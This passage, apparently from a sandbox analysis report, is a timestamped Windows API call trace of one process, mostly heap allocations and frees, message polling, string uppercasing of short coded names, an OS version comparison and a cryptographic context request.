| out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.983] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0249.983] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.984] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.984] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.984] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0249.984] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0249.984] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0249.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.985] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0249.985] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.985] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0249.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.986] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.986] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0249.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.987] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0249.987] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0249.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0249.987] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0249.987] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.987] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0249.987] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0249.987] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0249.988] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0249.988] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0249.988] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0249.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0249.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0249.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0249.988] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2720) returned 1 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0249.989] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0249.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0249.990] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0249.990] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0249.990] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0249.990] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0249.990] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.990] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0249.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0249.990] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.991] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.991] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.991] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0249.991] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0249.991] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0249.991] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0249.991] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.991] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0249.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0249.991] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0249.991] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0249.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0249.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0249.992] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0249.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0249.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0249.992] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0249.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0249.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0249.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0249.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0249.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0249.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0249.993] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0249.993] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0249.994] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0249.994] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0249.994] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0249.994] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0249.994] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.994] RtlAllocateHeap (HeapHandle=0x25c0000, 